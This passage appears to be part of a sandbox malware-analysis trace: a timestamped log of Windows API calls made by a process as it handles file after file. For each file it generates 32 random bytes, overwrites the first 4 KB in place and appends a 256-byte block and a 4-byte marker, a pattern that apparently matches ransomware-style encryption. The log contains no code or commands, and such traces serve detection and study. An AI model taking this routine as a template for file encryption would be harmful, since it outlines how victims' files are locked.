Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 35 [0077.203] SetFilePointerEx (in: hFile=0x818, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.203] ReadFile (in: hFile=0x818, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0077.203] SetFilePointerEx (in: hFile=0x818, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.203] GetProcessHeap () returned 0x280000 [0077.203] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0077.203] GetProcessHeap () returned 0x280000 [0077.203] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0077.203] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0077.203] GetProcessHeap () returned 0x280000 [0077.203] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0077.203] ReadFile (in: hFile=0x818, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0077.253] SetFilePointerEx (in: hFile=0x818, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.253] WriteFile (in: hFile=0x818, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0077.253] GetProcessHeap () returned 0x280000 [0077.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0077.253] GetProcessHeap () returned 0x280000 [0077.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.253] GetProcessHeap () returned 0x280000 [0077.253] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.254] GetProcessHeap () returned 0x280000 [0077.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.254] GetProcessHeap () returned 0x280000 [0077.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0077.255] GetProcessHeap () returned 0x280000 [0077.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.256] GetProcessHeap () returned 0x280000 [0077.256] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0077.256] GetProcessHeap () returned 0x280000 [0077.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0077.256] GetProcessHeap () returned 0x280000 [0077.256] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0077.256] GetProcessHeap () returned 0x280000 [0077.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0077.256] GetProcessHeap () returned 0x280000 [0077.256] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0077.256] GetProcessHeap () returned 0x280000 [0077.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0077.256] GetProcessHeap () returned 0x280000 [0077.256] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.256] GetProcessHeap () returned 0x280000 [0077.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0077.256] GetProcessHeap () returned 0x280000 [0077.256] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.256] GetProcessHeap () returned 0x280000 [0077.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.256] GetProcessHeap () returned 0x280000 [0077.256] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.256] GetProcessHeap () returned 0x280000 [0077.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.256] GetProcessHeap () returned 0x280000 [0077.256] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.256] GetProcessHeap () returned 0x280000 [0077.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.256] GetProcessHeap () returned 0x280000 [0077.256] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.257] GetProcessHeap () returned 0x280000 [0077.257] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.257] GetProcessHeap () returned 0x280000 [0077.257] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.257] GetProcessHeap () returned 0x280000 [0077.257] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.257] GetProcessHeap () returned 0x280000 [0077.257] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.257] GetProcessHeap () returned 0x280000 [0077.257] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.257] GetProcessHeap () returned 0x280000 [0077.257] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.257] GetProcessHeap () returned 0x280000 [0077.257] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.257] GetProcessHeap () returned 0x280000 [0077.257] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.257] GetProcessHeap () returned 0x280000 [0077.257] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.257] GetProcessHeap () returned 0x280000 [0077.257] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.257] GetProcessHeap () returned 0x280000 [0077.257] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.257] GetProcessHeap () returned 0x280000 [0077.257] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.257] GetProcessHeap () returned 0x280000 [0077.257] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.257] GetProcessHeap () returned 0x280000 [0077.258] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.258] GetProcessHeap () returned 0x280000 [0077.258] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.258] GetProcessHeap () returned 0x280000 [0077.258] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.258] GetProcessHeap () returned 0x280000 [0077.258] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.258] GetProcessHeap () returned 0x280000 [0077.258] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0077.258] GetProcessHeap () returned 0x280000 [0077.258] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.258] GetProcessHeap () returned 0x280000 [0077.258] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0077.258] GetProcessHeap () returned 0x280000 [0077.258] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0077.258] GetProcessHeap () returned 0x280000 [0077.258] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0077.258] GetProcessHeap () returned 0x280000 [0077.258] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0077.258] SetFilePointerEx (in: hFile=0x818, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.258] WriteFile (in: hFile=0x818, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0077.258] WriteFile (in: hFile=0x818, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0077.258] GetProcessHeap () returned 0x280000 [0077.258] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0077.258] GetProcessHeap () returned 0x280000 [0077.259] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0077.259] GetProcessHeap () returned 0x280000 [0077.259] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0077.259] CloseHandle (hObject=0x818) returned 1 [0077.260] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 36 [0077.260] SetFilePointerEx (in: hFile=0x81c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.260] ReadFile (in: hFile=0x81c, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0077.260] SetFilePointerEx (in: hFile=0x81c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.260] GetProcessHeap () returned 0x280000 [0077.260] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0077.260] GetProcessHeap () returned 0x280000 [0077.260] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0077.260] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0077.260] GetProcessHeap () returned 0x280000 [0077.260] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0077.260] ReadFile (in: hFile=0x81c, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0077.359] SetFilePointerEx (in: hFile=0x81c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.359] WriteFile (in: hFile=0x81c, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0077.359] GetProcessHeap () returned 0x280000 [0077.359] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0077.359] GetProcessHeap () returned 0x280000 [0077.359] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.359] GetProcessHeap () returned 0x280000 [0077.359] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0077.359] GetProcessHeap () returned 0x280000 [0077.359] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.359] GetProcessHeap () returned 0x280000 [0077.359] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0077.360] GetProcessHeap () returned 0x280000 [0077.360] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.360] GetProcessHeap () returned 0x280000 [0077.360] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.360] GetProcessHeap () returned 0x280000 [0077.360] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.360] GetProcessHeap () returned 0x280000 [0077.360] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.360] GetProcessHeap () returned 0x280000 [0077.360] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.360] GetProcessHeap () returned 0x280000 [0077.360] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.360] GetProcessHeap () returned 0x280000 [0077.360] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.360] GetProcessHeap () returned 0x280000 [0077.360] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.360] GetProcessHeap () returned 0x280000 [0077.360] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.360] GetProcessHeap () returned 0x280000 [0077.360] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.360] GetProcessHeap () returned 0x280000 [0077.360] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.360] GetProcessHeap () returned 0x280000 [0077.360] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.360] GetProcessHeap () returned 0x280000 [0077.451] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.451] GetProcessHeap () returned 0x280000 [0077.451] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.451] GetProcessHeap () returned 0x280000 [0077.451] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.452] GetProcessHeap () returned 0x280000 [0077.452] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.452] GetProcessHeap () returned 0x280000 [0077.453] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0077.453] GetProcessHeap () returned 0x280000 [0077.453] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.453] GetProcessHeap () returned 0x280000 [0077.453] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0077.453] GetProcessHeap () returned 0x280000 [0077.453] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0077.453] GetProcessHeap () returned 0x280000 [0077.453] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0077.453] GetProcessHeap () returned 0x280000 [0077.453] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0077.453] GetProcessHeap () returned 0x280000 [0077.453] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0077.453] GetProcessHeap () returned 0x280000 [0077.453] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0077.453] GetProcessHeap () returned 0x280000 [0077.453] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.453] GetProcessHeap () returned 0x280000 [0077.453] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0077.453] GetProcessHeap () returned 0x280000 [0077.453] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.453] GetProcessHeap () returned 0x280000 [0077.453] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.453] GetProcessHeap () returned 0x280000 [0077.453] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.453] GetProcessHeap () returned 0x280000 [0077.453] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.453] GetProcessHeap () returned 0x280000 [0077.453] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.453] GetProcessHeap () returned 0x280000 [0077.453] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.454] GetProcessHeap () returned 0x280000 [0077.454] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.454] GetProcessHeap () returned 0x280000 [0077.454] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.454] GetProcessHeap () returned 0x280000 [0077.454] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.454] GetProcessHeap () returned 0x280000 [0077.454] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.454] GetProcessHeap () returned 0x280000 [0077.454] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.454] GetProcessHeap () returned 0x280000 [0077.454] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.454] GetProcessHeap () returned 0x280000 [0077.454] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.454] GetProcessHeap () returned 0x280000 [0077.454] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.454] GetProcessHeap () returned 0x280000 [0077.454] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.454] GetProcessHeap () returned 0x280000 [0077.454] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.454] GetProcessHeap () returned 0x280000 [0077.454] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.454] GetProcessHeap () returned 0x280000 [0077.454] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.454] GetProcessHeap () returned 0x280000 [0077.454] 